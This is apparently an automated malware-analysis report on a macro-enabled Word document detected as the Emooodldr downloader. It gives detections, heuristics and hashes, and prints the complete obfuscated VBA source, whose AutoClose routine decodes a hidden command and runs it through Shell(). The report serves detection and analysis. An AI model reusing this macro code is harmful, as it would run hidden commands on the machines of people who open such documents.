MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious OOXML document containing VBA macros. The AutoClose macro is present and uses the Shell() function to execute a command. ClamAV signatures indicate this is likely the Emooodldr family, which typically downloads and executes a second-stage payload. The VBA code appears to be obfuscated, but the presence of AutoClose and Shell() calls strongly suggests this behavior.
Heuristics 6
-
ClamAV: Doc.Malware.Emooodldr-6711604-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emooodldr-6711604-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 2090 bytes |
SHA-256: d14f7206d929326c9e4ea49eea128df53eaba73958bdf6cc62af299b734c3a85 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function handclap(relevant)
dodecarchy = Array("k", "E", "f", "4", "s", "p", "W", "5", "Q", "0", "b", "d", "i", "3", "X", "2", "l", "g", "", "Z", "C", "v", "8", "z", "P", "e", "L", "M")
unsummerly = Array("c", "P", "R", "u", "e", "o", "d", "x", "?", "/", "p", "k", "h", ":", "m", "n", "j", "s", "f", "=", "q", " ", "i", "a", "G", ".", "w", "t")
nonintegrity = vbNullString
For Each gweducks In relevant
nonsymmetric = aureoling(gweducks, dodecarchy)
If nonsymmetric > -1 Then
nonintegrity = unsummerly(nonsymmetric) + nonintegrity
End If
Next
handclap = StrReverse(nonintegrity)
End Function
Public Function aureoling(levee, gynophore)
dilutenesses = 5521
effulging = 7919
For dilutenesses = 0 To UBound(gynophore)
If gynophore(dilutenesses) = levee And dilutenesses > -1 Then
effulging = dilutenesses
End If
Next
If effulging = 7919 Then
effulging = -1
End If
aureoling = effulging
End Function
Sub AutoClose()
relevant = Array("X", "g", "i", "M", "z", "e", "s", "5", "s", "v", "i", "M", "M", "b", "3", "0", "0", "8", "l", "W", "C", "2", "L", "W", "C", "4", "L", "W", "p", "z", "g", "8", "W", "l", "e", "k", "p", "X", "0", "f", "E", "P", "0", "g", "p", "", "e", "b", "i", "b", "Q", "4", "M", "X", "z", "Z", "p", "b", "g", "d")
shuttling = handclap(relevant)
Application.Run "impowering", (shuttling)
End Sub
Private Sub impowering(tailor)
burnishment = 16202
preallocated = True
While preallocated
sexlessnesses = burnishment + 717
If sexlessnesses - burnishment > 1 Then
lamppost = jibber + "ll"
Call VBA.Shell(tailor, vbNormalFocus - 1)
preallocated = False
End If
Wend
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 11776 bytes |
SHA-256: a30e36f8552a611b0078a53d8052e36e806d7023c80085f53d75d902b60d89e0 |
|||
|
Detection
ClamAV:
Doc.Malware.Emooodldr-6711604-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.